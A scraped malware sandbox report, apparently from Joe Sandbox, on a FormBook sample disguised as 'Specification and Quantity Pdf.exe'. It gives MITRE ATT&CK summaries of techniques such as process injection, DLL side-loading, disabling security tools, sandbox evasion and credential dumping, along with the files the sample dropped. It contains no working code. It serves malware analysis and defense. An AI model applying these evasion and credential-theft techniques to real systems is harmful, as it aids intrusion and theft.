Description:	Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., Native API ).
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads (ex: `rundll32.exe {DLLname, DLLfunction}` ).
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Specification and Quantity Pdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: FormBook

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Stealing of Sensitive Information

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

E-Banking Fraud

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\DB1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3zz3oqrr.eh2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5ourtqv.q22.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hp25duew.0m1.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z55mdlwf.clt.ps1

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogim.jpeg

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogrg.ini

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogri.ini

C:\Users\user\AppData\Roaming\95N0Q4RA\95Nlogrv.ini

C:\Users\user\Specification and Quantity Pdf.exe

Static File Info

Windows Analysis Report
Specification and Quantity Pdf.exe

Function 00007FF773C61460 Relevance: 10.6, APIs: 7, Instructions: 120
COMMON

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre